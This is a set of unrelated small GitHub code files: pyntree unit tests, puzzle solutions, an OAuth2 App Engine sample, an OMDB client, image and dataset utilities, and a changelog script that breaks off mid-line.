self.assertEqual(Node('tests/testing_output.' + ext)(), db())\n os.remove('tests/testing_output.' 
+ ext)\n\n def test_serialized_save(self):\n db = Node({'time': dt.now()})\n db.save('tests/testing_serialization.pyn')\n os.remove('tests/testing_serialization.pyn')\n self.assertTrue(True)\n\n def test_encrypted_save(self):\n for ext in EXTENSIONS:\n with self.subTest(msg=ext):\n db = Node({'a': 1, 'b': {'c': 2}}, password='testing')\n db.save(f'tests/newdb.{ext}')\n os.remove(f'tests/newdb.{ext}')\n\n def test_encrypted_save_method(self):\n Node({'a': 1}).save('tests/newdb.pyn', password='testing')\n Node('tests/newdb.pyn', password='testing') # Attempt load to verify a proper save\n os.remove('tests/newdb.pyn')\n\n def test_save_to_alternate_file(self):\n # Initial data\n db = Node({'a': 1, 'b': {'c': 2}})\n db.switch_to_file('tests/testing_output.txt')\n db.save()\n del db\n # Overwrite, but maintain original file object\n db = Node({'n': 1, 'b': {'c': 2}})\n db.switch_to_file('tests/testing_output_2.pyn')\n db.save(filename='tests/testing_output.txt')\n db.save()\n self.assertEqual(Node(\"tests/testing_output.txt\")(), {'n': 1, 'b': {'c': 2}})\n self.assertEqual(Node(\"tests/testing_output_2.pyn\")(), {'n': 1, 'b': {'c': 2}})\n os.remove(\"tests/testing_output.txt\")\n os.remove(\"tests/testing_output_2.pyn\")\n\n def test_dictionary_filename(self):\n db = Node({'a': 'b'})\n db.save(filename='tests/testing_savedict.json')\n self.assertEqual(Node('tests/testing_savedict.json')(), {'a': 'b'})\n os.remove('tests/testing_savedict.json')\n\n def test_dictionary_filename_alt(self):\n db = Node({'a': 'b'})\n db.switch_to_file('tests/testing_savedict.json')\n db.save()\n self.assertEqual(Node('tests/testing_savedict.json')(), {'a': 'b'})\n os.remove('tests/testing_savedict.json')\n\n def test_node_in_node(self):\n db = Node({'a': Node()})\n db.save('tests/testing_save_NiN.pyn')\n os.remove('tests/testing_save_NiN.pyn')\n\n def test_save_after_password_set(self):\n db = Node({'a': 'b'})\n db.file.password = 'testing'\n db.save('tests/testing_encrypted_setpwd.pyn')\n self.assertEqual(Node('tests/testing_encrypted_setpwd.pyn', password='testing')(), {'a': 'b'})\n os.remove('tests/testing_encrypted_setpwd.pyn')\n\n def test_save_after_password_change(self):\n db = Node('tests/testing_encrypted_changepwd.pyn', password='testing1')\n db.a = 'b'\n db.file.password = 'testing2'\n db.save('tests/testing_encrypted_changepwd.pyn')\n self.assertEqual(Node('tests/testing_encrypted_changepwd.pyn', password='testing2')(), {'a': 'b'})\n os.remove('tests/testing_encrypted_changepwd.pyn')\n\n\nclass DeletionTests(unittest.TestCase):\n def test_layer_0(self):\n db = Node({'a': {'b': {'c': 'd'}}, 'b': \"test\"})\n db.delete()\n self.assertEqual(db(), {})\n\n def test_layer_1(self):\n db = Node({'a': {'b': {'c': 'd'}}, 'b': \"test\"})\n db.delete('a')\n self.assertEqual(db(), {'b': 'test'})\n\n def test_layer_1_alternate(self):\n db = Node({'a': {'b': {'c': 'd'}}, 'b': \"test\"})\n db.a.delete()\n self.assertEqual(db(), {\"b\": \"test\"})\n\n def test_layer_2(self):\n db = Node({'a': {'b': {'c': 'd'}}, 'b': \"test\"})\n db.a.delete('b')\n self.assertEqual(db(), {'a': {}, 'b': \"test\"})\n\n def test_layer_2_alternate(self):\n db = Node({'a': {'b': {'c': 'd'}}, 'b': \"test\"})\n db.a.b.delete()\n # noinspection PyCallingNonCallable\n self.assertEqual(db(), {'a': {}, 'b': \"test\"})\n\n def test_star_args(self):\n db = Node({'a': '', 'b': '', 'c': ''})\n db.delete(*'abc')\n self.assertEqual(db(), {})\n\n\nclass FileScanningTests(unittest.TestCase):\n def setUp(self):\n self.db = Node({\"val1\": 'h', \"val2\": 
'b'})\n\n def test_has(self):\n self.assertTrue(self.db.has(\"val1\"))\n\n def test_has_star_args(self):\n self.assertTrue(self.db.has(\"val1\", \"val2\"))\n\n def test_values(self):\n self.assertEqual(self.db._values, [\"val1\", \"val2\"])\n\n def test__str__(self):\n self.assertEqual(str(self.db), str({\"val1\": 'h', \"val2\": 'b'}))\n\n def test__str__final(self):\n self.assertEqual(str(self.db.val1), \"h\")\n\n def test__repr__(self):\n self.assertEqual(repr(self.db), \"Node(\" + str({\"val1\": 'h', \"val2\": 'b'}) + \")\")\n\n def test__repr__final(self):\n self.assertEqual(repr(self.db.val1), \"'h'\")\n\n def test_name_layer_0_data(self):\n self.assertEqual(self.db._name, 'None')\n\n def test_name_layer_0_file(self):\n self.assertEqual(Node('tests/sample.txt')._name, 'tests/sample.txt')\n\n def test_name_layer_1(self):\n self.assertEqual(self.db.val1._name, 'val1')\n\n def test_get_children(self):\n self.assertEqual(self.db._children[0](), 'h')\n\n def test_where(self):\n db = Node({\n \"a\": {\n \"b\": 2\n },\n \"b\": {\n \"b\": 2\n },\n \"c\": {\n \"b\": 3\n }\n })\n matches = db.where(b=2)\n self.assertEqual(len(matches), 2)\n self.assertTrue(type(matches[0]) is Node)\n self.assertEqual(str(matches[0]), str({\"b\": 2}))\n\n def test_containing(self):\n db = Node({\n \"a\": {\n \"h\": 2\n },\n \"b\": {\n \"b\": 2\n },\n \"c\": {\n \"b\": 3\n }\n })\n matches = db.containing('b')\n self.assertEqual(len(matches), 2)\n self.assertTrue(type(matches[0]) is Node)\n self.assertEqual(str(matches[0]), str({\"b\": 2}))\n\n def test_getdict(self):\n db = Node({'a': {'b': {'c': 1}}})\n self.assertEqual(str(dict(db)), str({'a': {'b': {'c': 1}}}))\n\n\n# noinspection PyCallingNonCallable\nclass ArithmeticTests(unittest.TestCase):\n def test_iadd_int(self):\n db = Node()\n db.a = 1\n db.a += 1\n self.assertEqual(db.a(), 2)\n\n def test_iadd_str(self):\n db = Node()\n db.a = 'a'\n db.a += 'bc'\n self.assertEqual(db.a(), 'abc')\n\n def test_isub_int(self):\n db = Node()\n db.a = 1\n db.a -= 1\n self.assertEqual(db.a(), 0)\n\n def test_imul_int(self):\n db = Node()\n db.a = 2\n db.a *= 3\n self.assertEqual(db.a(), 6)\n\n def test_imul_str(self):\n db = Node()\n db.a = 'a'\n db.a *= 3\n self.assertEqual(db.a(), 'aaa')\n\n def test_cmp(self):\n db = Node()\n db.a = 1\n db.b = 2\n self.assertTrue(db.a < db.b)\n self.assertTrue(db.a <= db.b)\n self.assertFalse(db.a > db.b)\n self.assertFalse(db.a >= db.b)\n self.assertFalse(db.a == db.b)\n self.assertTrue(db.a != db.b)\n\n def test_nested_operations(self):\n db = Node({'a': {'b': 1}})\n db.a.b += 1\n self.assertEqual(db.a.b(), 2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jvadair/pyntree","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11669,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15781364132","text":"files = ['input.txt', 'testInput.txt']\nwith open(files[0], 'r') as f:\n line = f.readlines()[0]\n\nrow = int(line[line.index(\"row\")+4: line.index(\", column\")])\ncol = int(line[line.index(\"column\")+7: line.index(\".\\n\")])\n\nnumber = 20151125\nr,c = 1,1\n\nwhile True:\n if r == row and c == col:\n break\n r -= 1\n c += 1\n if r == 0:\n r = c\n c = 1\n number = (number * 252533) % 
33554393\n\nprint(number)\n","repo_name":"nabihestefan/AdventOfCode","sub_path":"Python/2015/day25/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28780323845","text":"class Solution:\r\n def exist(self, board, word: str) -> bool:\r\n for i in board:\r\n i.insert(0, 0)\r\n i.append(0)\r\n board = [[0 for i in range(len(board[0]))]] + board + [[0 for i in range(len(board[0]))]]\r\n start = []\r\n for i in range(1, len(board) - 1):\r\n for j in range(1, len(board[0]) - 1):\r\n if word[0] == board[i][j]:\r\n start.append([i, j])\r\n for i in start:\r\n if self.search(board, word, i, 1, [i]):\r\n return True\r\n return False\r\n\r\n def search(self, board, word, position, letter, path):\r\n if letter == len(word):\r\n return True\r\n else:\r\n for i in [[position[0], position[1] + 1], [position[0], position[1] - 1], [position[0] + 1, position[1]], [position[0] - 1, position[1]]]:\r\n if board[i[0]][i[1]] == word[letter] and i not in path:\r\n if self.search(board, word, i, letter + 1, path+[i]):\r\n return True\r\n return False\r\n\r\n\r\na = Solution()\r\ninp1 = [[\"C\",\"A\",\"A\"],[\"A\",\"A\",\"A\"],[\"B\",\"C\",\"D\"]]\r\ninp2 = 'CBD'\r\nprint(a.exist(inp1, inp2))\r\n","repo_name":"MinnanZhou/Leetcode","sub_path":"79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6783123227","text":"import cv2 as cv\n# colors \nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nMAGENTA = (255, 0, 255)\nGREEN = (0, 255, 0)\nCYAN = (255, 255, 0)\nGOLD = (0, 255, 215)\nYELLOW = (0, 255, 255)\nORANGE = (0, 165, 230)\n\n\ndef showText(image, text, position, color, animateOnValue=None):\n fonts = cv.FONT_HERSHEY_COMPLEX\n x, y = position\n # move the callout up little bit.\n y = y - 20\n # how much tick line should be, \n lineThicknes = 30\n offset = int(lineThicknes / 2)\n center = int(offset / 2)\n new_pos = (x, y + center)\n lineLength = 229\n\n newThickness = int(lineThicknes * 0.7)\n \n cv.line(image, (x, y), (x+lineLength, y), ORANGE, lineThicknes)\n cv.line(image, (x, y), (x+lineLength, y), GREEN, newThickness)\n if animateOnValue is not None:\n\n cv.line(image, (x, y), (x+animateOnValue, y), WHITE, newThickness)\n # cv.line(image, (x,y-11), (x+Distance_level, y-11), (GREEN), 18)\n cv.putText(image, text, new_pos, fonts, 0.6, BLACK, 2)\n\n","repo_name":"Asadullah-Dal17/QR-detection-and-Distance-Estimation","sub_path":"betterLook.py","file_name":"betterLook.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"21"} +{"seq_id":"38668249973","text":"#!/usr/bin/env python\nimport webapp2\nimport json\nimport logging\n\nfrom httplib2 import Http\nfrom urllib import urlencode\n\nCLIENT_ID = 'YOUR_CLIENT_ID'\nCLIENT_SECRET = 'YOUR_CLIENT_SECRET'\nREDIRECT_URI = 'https://.appspot.com/'\n#REDIRECT_URI = 'http://localhost:14084/'\n\nAUTH_URL = \t\"https://accounts.google.com/o/oauth2/auth?client_id=\" + CLIENT_ID +\"&response_type=code&redirect_uri=\" + REDIRECT_URI +\"&state=mysecurestate&scope=https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/plus.me%20https://www.googleapis.com/auth/drive\"\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n code = self.request.get('code', None)\n if code is None:\n \t self.redirect(AUTH_URL)\n 
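# Google sent the browser back with ?code=...: exchange it for tokens, then call the userinfo and Drive APIs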
else:\n \t h = Http()\n \t data = dict(code=code, client_id=CLIENT_ID, client_secret=CLIENT_SECRET,redirect_uri=REDIRECT_URI,grant_type=\"authorization_code\")\n \t resp, access_content = h.request('https://accounts.google.com/o/oauth2/token', 'POST', urlencode(data))\n \t \n \t #this call gets us email info. however, decrypting the ID_TOKEN would have done it too\n \t userinfo_endpoint = 'https://www.googleapis.com/oauth2/v3/userinfo' \n \t data = json.loads(access_content)\n \t headers = {'Authorization': 'Bearer ' + data['access_token']}\n \t resp, profile_content = h.request(userinfo_endpoint, 'GET', headers=headers)\n\n \t drive_endpoint = 'https://www.googleapis.com/drive/v2/files'\n \t resp, drive_content = h.request(drive_endpoint, 'GET', headers=headers)\n \t \n \t self.response.out.write(access_content+'
<br><br>'+profile_content+'<br><br>
')\n\n \t driveFiles = json.loads(drive_content)\n \t for file in driveFiles['items']:\n \t \tself.response.out.write('
<br><br>'+ file['title'] + '<br><br>
')\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler),\n], debug=True)\n","repo_name":"entaq/OAuth2Flows","sub_path":"ServerSide.py","file_name":"ServerSide.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"41247395156","text":"import os\nfrom dotenv import load_dotenv\nimport requests\nfrom typing import Optional, List, Tuple\n\n\nclass OMDBApi:\n\n def __init__(self):\n load_dotenv()\n self.api_key = os.getenv(\"API_KEY\")\n self.url = \"https://www.omdbapi.com\"\n\n def _images_path(self, title: str) -> Optional[Tuple[str, str, str, str]]:\n \"\"\"\n Helper function to fetch data about an image and movie from the OMDB API.\n\n Parameters:\n title (str): The movie title.\n\n Returns:\n Optional[Tuple[str, str, str, str]]: A tuple containing the image URL (poster),\n release date, runtime, and plot description.\n \"\"\"\n params = {\n \"apikey\": self.api_key,\n \"t\": title\n }\n\n response = requests.get(self.url, params=params)\n data = response.json()\n\n if response.status_code == 200 and data.get(\"Poster\"):\n # Extract release date, runtime, and plot from API data\n released = data.get(\"Released\", \"\")\n runtime = data.get(\"Runtime\", \"\")\n plot = data.get(\"Plot\", \"\")\n # Return the poster URL, release date, runtime, and plot description\n return data[\"Poster\"], released, runtime, plot\n else:\n return None, \"\", \"\", \"\"\n\n def get_movie_info(self, titles: List[str]) -> List[dict]:\n \"\"\"\n Get information about a movie from the OMDB API.\n\n Parameters:\n titles (List[str]): A list of movie titles.\n\n Returns:\n List[dict]: A list of dictionaries containing information about the movies,\n including title, poster, release date, runtime, and plot description.\n \"\"\"\n movie_info_list = []\n for title in titles:\n path, released, runtime, plot = self._images_path(title) # Extract plot from the _images_path function\n movie_info_list.append({\n \"title\": title,\n \"poster\": path,\n \"released\": released,\n \"runtime\": runtime,\n \"plot\": plot\n })\n return movie_info_list\n\n def get_posters(self, titles: List[str]) -> List[str]:\n \"\"\"\n Get image URLs (posters) for a list of movies.\n\n Parameters:\n titles (List[str]): A list of movie titles.\n\n Returns:\n List[str]: A list of image URLs (posters).\n \"\"\"\n posters = []\n released_list = [] # Create a list to store movie release years\n runtime_list = [] # Create a list to store movie runtimes\n plot_list = [] # Create a list to store movie plot descriptions\n\n for title in titles:\n path, released, runtime, plot = self._images_path(title)\n if path: # If the image doesn't exist\n posters.append(path)\n else:\n posters.append('assets//none.jpeg') # Add a placeholder image\n released_list.append(released) # Add the movie release year to the list\n runtime_list.append(runtime) # Add the movie runtime to the list\n plot_list.append(plot) # Add the movie plot description to the list\n return posters, released_list, runtime_list\n\n","repo_name":"AlexanderVeshniakov/Educational_project_11","sub_path":"src/api/omdb.py","file_name":"omdb.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40026786222","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nwith open('x_y.txt', 'r') as f: \n lines = f.readlines()\nfor line in lines: \n x, y = line.split('=')[0], line.split('=')[1]\n x, y 
= x.split(' '), y.split(' ')\n x = [i for i in x if i]\n y = [i for i in y if i]\n x[0] = x[0][1:]\n y[0] = y[0][1:]\n x[-1] = x[-1][:-1]\n y[-1] = y[-1][:-1]\n\n x = [float(i) for i in x if i]\n y = [float(i) for i in y if i]\n \n S=np.zeros(360, dtype='complex_')\n for i in range(360):\n for k in range(360):\n a=x[k]\n b=y[k]\n tmp = ((-2j*np.pi*i*k)) /360\n S[i] += (complex(a,b)) * np.exp(tmp)\n S[i]=S[i]/360\n G=np.zeros(360, dtype='complex_')\n xfinal=np.zeros(360)\n yfinal=np.zeros(360)\n for i in range(360):\n k=0\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=359\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=1\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=358\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=2\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=357\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=3\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=356\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=4\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=355\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=5\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n xfinal[i]=np.real(G[i])\n yfinal[i]=np.imag(G[i])\n\n plt.plot(x,y,color=\"red\")\n plt.show() \n plt.plot(xfinal,yfinal,color=\"green\")\n plt.show()\n\n \n \n","repo_name":"StructuredProgramming/Fourier-Transform-on-Dataset","sub_path":"FourierDescriptors.py","file_name":"FourierDescriptors.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32053440614","text":"\"\"\"Webassets configuration and handling\"\"\"\nimport os.path\n\nfrom flask import send_from_directory\nfrom flask_assets import Environment, Bundle\n# pylint: disable=no-name-in-module\nfrom pygments.formatters import HtmlFormatter\n\n\ndef _create_code_css(app):\n \"\"\"\n Creates the code.css file for code highlighting\n\n This will be used to merge all the css in one file\n \"\"\"\n filename = os.path.join(app.static_folder, 'style', 'code.css')\n with open(filename, 'w') as code_css:\n css = HtmlFormatter(style='default').get_style_defs('.codehilite')\n code_css.write(css)\n\n\ndef register_assets(app):\n \"\"\"Register Webassets in the app\"\"\"\n _create_code_css(app)\n\n assets = Environment(app)\n bundle = Bundle('style/main.less', 'style/code.css',\n filters='less,cleancss',\n output='css/main.%(version)s.css')\n assets.register('css', bundle)\n app.add_url_rule(\n '/static/fonts/bootstrap/',\n 'bootstrap_fonts',\n bootstrap_fonts)\n\n\ndef bootstrap_fonts(filename):\n \"Sends bootstrap font files\"\n # It will do: os.path.join(current_app.root_path, filename)\n return send_from_directory(\n '../node_modules/bootstrap/fonts/', filename)\n","repo_name":"graffic/javiergr","sub_path":"javiergr/assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"34290595079","text":"from Environment import RandomMG\nfrom Agent import PAgent\nimport numpy as np\nimport util\nimport matplotlib.pyplot as plt\nimport os\n\n\n\nclass GameSimulator:\n def __init__(self, env, T):\n self.env = env\n self.T = T\n self.gamma = self.env.gamma\n\n eta = 0.125 / np.sqrt(self.env.A + self.env.B)\n self.P1 = PAgent(self.env.S, self.env.A, self.gamma, eta)\n self.P2 = PAgent(self.env.S, self.env.B, self.gamma, eta)\n if not 
os.path.exists('figure/tmp'):\n os.makedirs('figure/tmp')\n\n def simulate_full_info(self):\n print(\"=== offline solving the game ===\")\n self.env.solve(eps=0.001, max_iter=np.inf, verbose=True)\n self.P1.reset()\n self.P2.reset()\n\n for t in range(self.T): \n x = self.P1.get_policy()\n y = self.P2.get_policy()\n ry = np.einsum('sab,sb->sa', self.env.r, y) \n py = np.einsum('sabq,sb->saq', self.env.p, y)\n rx = np.einsum('sab,sa->sb', self.env.r, x)\n px = np.einsum('sabq,sa->sbq', self.env.p, x)\n self.P1.update(ry, py)\n self.P2.update(-rx, px)\n \n if t % 100 == 0: \n self._output_gap(t)\n if t % 10 == 0:\n self._output_figure(t)\n \n def _output_gap(self, t): \n x = self.P1.get_policy()\n y = self.P2.get_policy()\n gap, maxgap_state = util.MGdualGap(self.env.r, self.env.p, self.gamma, x, y, eps=0.001, max_iter=np.inf)\n print(\" t=\",t, \" gap=\", gap, \" maxgap_state=\", maxgap_state)\n \n def _output_figure(self, t): \n s = 0\n # calculate Q of the current policies\n x = self.P1.get_policy()\n xs = x[s,:]\n y = self.P2.get_policy()\n ys = y[s,:]\n\n V = util.MGVI(task='eval', r=self.env.r, p=self.env.p, gamma=self.gamma, \n x=x, y=y, eps=0.001, max_iter=np.inf)\n Q = util.Q_from_V(r=self.env.r, p=self.env.p, V=V, gamma=self.gamma)\n _, xstar, ystar, _ = util.solveGame(Q[s,:,:], eps=0.001, max_iter=np.inf, \n x_init=xs, y_init=ys)\n\n plt.figure(t)\n plt.scatter(xstar[0], ystar[0], c='r') \n plt.scatter(xs[0], ys[0], c='b')\n plt.scatter(self.env.x[s,0], self.env.y[s,0], c='g')\n plt.xlim((0,1))\n plt.ylim((0,1))\n\n plt.savefig('figure/tmp/%03d.png' % (t/10))\n plt.close(t)\n\n\n\n","repo_name":"bahh723/competitive-markov-game","sub_path":"GameSimulator.py","file_name":"GameSimulator.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1740667119","text":"# Considring you have a list with 128 names and you are doing a binary search. 
\n# What would be the maximum number of steps you would take to find the desired name?\n\ndef binary_search(list, item):\n low = 0 \n high = len(list) - 1\n while low <= high:\n mid = (low + high) // 2\n guess = list[mid]\n if guess == item:\n return mid\n if guess > item:\n high = mid - 1\n else: \n low = mid + 1\n return None \n\nmy_array = [None for _ in range(128)]\nmy_array = [None] * 128\n\nfor i in range(len(my_array)):\n my_array[i] = i\n\nmy_list = my_array\n\nprint (binary_search(my_list, 54))","repo_name":"londonplayer/Python","sub_path":"algorithms/excercises/binary_search_1.1.py","file_name":"binary_search_1.1.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38262928836","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom urllib2.request import urlretrieve\nimport os\n\ndef image_down(start_img, stop_img):\n for numb in range(start_img, stop_img):\n url = 'http://xkcd.com/{}/'.format(numb)\n url_get = requests.get(url)\n soup = BeautifulSoup(url_get.content, 'html.parser')\n link = soup.find('div', id='comic').find('img').get('src')\n link = link.replace('//', 'http://')\n img_name = os.path.basename(link)\n try:\n urlretrieve(link, img_name)\n except:\n # Just want images don't care about errors\n pass\n\nif __name__ == '__main__':\n start_img = 1\n stop_img = 20\n image_down(start_img, stop_img)\n","repo_name":"veyronvenom1200/code","sub_path":"python/image_download.py","file_name":"image_download.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33845679837","text":"class Solution(object):\n def findKthLargest(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n import heapq\n num_heap = nums[:k]\n heapq.heapify(num_heap)\n for n in nums[k:]:\n if num_heap[0] < n:\n heapq.heappop(num_heap)\n heapq.heappush(num_heap, n)\n\n return num_heap[0]\n\n\nif __name__ == \"__main__\":\n nums = [3, 2, 1, 5, 6, 4]\n k = 4\n print(Solution().findKthLargest(nums, k))\n","repo_name":"simplynaive/LeetCode","sub_path":"215. Kth Largest Element in an Array.py","file_name":"215. 
Kth Largest Element in an Array.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24601858161","text":"\"\"\"\nhttps://blog.csdn.net/qq_39686950/article/details/119153685?spm=1001.2101.3001.6650.12&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-12.no_search_link&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-12.no_search_link&utm_relevant_index=18\n\"\"\"\nimport os\nimport json\nimport cv2\nimport random\nimport time\nfrom PIL import Image\nfrom tqdm import tqdm\n\n\nif __name__ == \"__main__\":\n coco_format_save_path = 'E:\\\\pycharm-projects\\\\dataset\\\\DSMhand_smoke3\\\\coco\\\\annotations\\\\' # 要生成的标准coco格式标签所在文件夹\n yolo_format_classes_path = 'E:\\\\pycharm-projects\\\\dataset\\\\DSMhand_smoke3\\\\yolov5\\\\class_name.txt' # 类别文件,一行一个类\n yolo_format_annotation_path = 'E:\\\\pycharm-projects\\\\dataset\\\\DSMhand_smoke3\\\\yolov5\\\\labels\\\\val\\\\' # yolo格式标签所在文件夹\n img_pathDir = 'E:\\\\pycharm-projects\\\\dataset\\\\DSMhand_smoke3\\\\yolov5\\\\images\\\\val\\\\' # 图片所在文件夹\n\n with open(yolo_format_classes_path, 'r') as fr: # 打开并读取类别文件\n lines1 = fr.readlines()\n # print(lines1)\n categories = [] # 存储类别的列表\n for j, label in enumerate(lines1):\n label = label.strip()\n categories.append({'id': j + 1, 'name': label, 'supercategory': 'None'}) # 将类别信息添加到categories中\n # print(categories)\n\n write_json_context = dict() # 写入.json文件的大字典\n write_json_context['info'] = {'description': '', 'url': '', 'version': '', 'year': 2022, 'contributor': '',\n 'date_created': '2022-1-5'}\n write_json_context['licenses'] = [{'id': 1, 'name': None, 'url': None}]\n write_json_context['categories'] = categories\n write_json_context['images'] = []\n write_json_context['annotations'] = []\n\n # 接下来的代码主要添加'images'和'annotations'的key值\n imageFileList = os.listdir(img_pathDir) # 遍历该文件夹下的所有文件,并将所有文件名添加到列表中\n for i, imageFile in enumerate(tqdm(imageFileList)):\n imagePath = os.path.join(img_pathDir, imageFile) # 获取图片的绝对路径\n image = Image.open(imagePath) # 读取图片,然后获取图片的宽和高\n W, H = image.size\n\n img_context = {} # 使用一个字典存储该图片信息\n # img_name=os.path.basename(imagePath) #返回path最后的文件名。如果path以/或\\结尾,那么就会返回空值\n img_context['file_name'] = imageFile\n img_context['height'] = H\n img_context['width'] = W\n img_context['date_captured'] = '2022-1-5'\n img_context['id'] = i # 该图片的id\n img_context['license'] = 1\n img_context['color_url'] = ''\n img_context['flickr_url'] = ''\n write_json_context['images'].append(img_context) # 将该图片信息添加到'image'列表中\n\n txtFile = imageFile.split(\".\")[0] + '.txt' # 获取该图片获取的txt文件\n with open(os.path.join(yolo_format_annotation_path, txtFile), 'r') as fr:\n lines = fr.readlines() # 读取txt文件的每一行数据,lines2是一个列表,包含了一个图片的所有标注信息\n for j, line in enumerate(lines):\n bbox_dict = {} # 将每一个bounding box信息存储在该字典中\n # line = line.strip().split()\n # print(line.strip().split(' '))\n\n class_id, x, y, w, h = line.strip().split(' ') # 获取每一个标注框的详细信息\n class_id, x, y, w, h = int(class_id), float(x), float(y), float(w), float(h) # 将字符串类型转为可计算的int和float类型\n\n xmin = (x - w / 2) * W # 坐标转换\n ymin = (y - h / 2) * H\n xmax = (x + w / 2) * W\n ymax = (y + h / 2) * H\n w = w * W\n h = h * H\n\n bbox_dict['id'] = i * 10000 + j # bounding box的坐标信息\n bbox_dict['image_id'] = i\n bbox_dict['category_id'] = class_id + 1 # 注意目标类别要加一\n bbox_dict['iscrowd'] = 0\n height, width = abs(ymax - ymin), abs(xmax - xmin)\n 
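# COCO convention: 'bbox' is [x_min, y_min, width, height]; 'area' is width * height in absolute pixels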
bbox_dict['area'] = height * width\n bbox_dict['bbox'] = [xmin, ymin, w, h]\n bbox_dict['segmentation'] = [[xmin, ymin, xmax, ymin, xmax, ymax, xmin, ymax]]\n write_json_context['annotations'].append(bbox_dict) # 将每一个由字典存储的bounding box信息添加到'annotations'列表中\n\n name = os.path.join(coco_format_save_path, \"val\" + '.json')\n with open(name, 'w') as fw: # 将字典信息写入.json文件中\n json.dump(write_json_context, fw, indent=2)","repo_name":"CPFelix/nanodet","sub_path":"tools/yolov5_to_coco.py","file_name":"yolov5_to_coco.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"28801865277","text":"import sys\n\nn=int(input())\nif n < 2:\n print('No')\nelif n == 2:\n print('Yes')\nelif n % 2 == 0:\n print('No')\nelse:\n i=3\n # √nで割れなければnでも割れないため√nまでの数字で割り切れないかをチェックする\n while i * i <= n:\n if n % i == 0:\n print('No')\n sys.exit()\n i+=1\n print('Yes')\n","repo_name":"Satjopg/atcoder","sub_path":"algo/012_primality_test.py","file_name":"012_primality_test.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4121462467","text":"#!/usr/bin/env python3\nimport os\nimport re\nimport sys\nimport yaml\nimport fnmatch\nimport logging\nfrom datetime import datetime\n\n\ndef read_module(root = os.curdir):\n with open(os.path.join(root, 'ci.yml')) as fin:\n ci = yaml.safe_load(fin)\n\n return [\n module for module in ci['extends']['parameters']['Artifacts'] if module['name'] != 'azure-resourcemanager-samples'\n ]\n\ndef get_version(module: dict, version_file: str):\n module_name = '{}:{}'.format(module['groupId'], module['name'])\n with open(version_file) as fin:\n for line in fin.readlines():\n line = line.strip()\n if line and not line.startswith('#'):\n name, _, version = line.split(';')\n if name == module_name:\n return version\n\n raise KeyError('Cannot found version of {} in {}'.format(module_name, version_file))\n\ndef removeEmptyEntry(changelogContent: str):\n previous_entry_exists = False\n previous_entry_line = None\n left = changelogContent\n for line in left.split('\\n'):\n line = line.strip()\n if not line:\n continue\n if not line.startswith('### '):\n previous_entry_exists = True\n else:\n if not previous_entry_exists and previous_entry_line:\n left = re.sub(previous_entry_line + '\\s*', '', left)\n previous_entry_exists = False\n previous_entry_line = line\n # last line\n if not previous_entry_exists and previous_entry_line:\n left = re.sub('\\n{0,1}' + previous_entry_line + '\\s*', '', left)\n return left\n\ndef main():\n basedir = 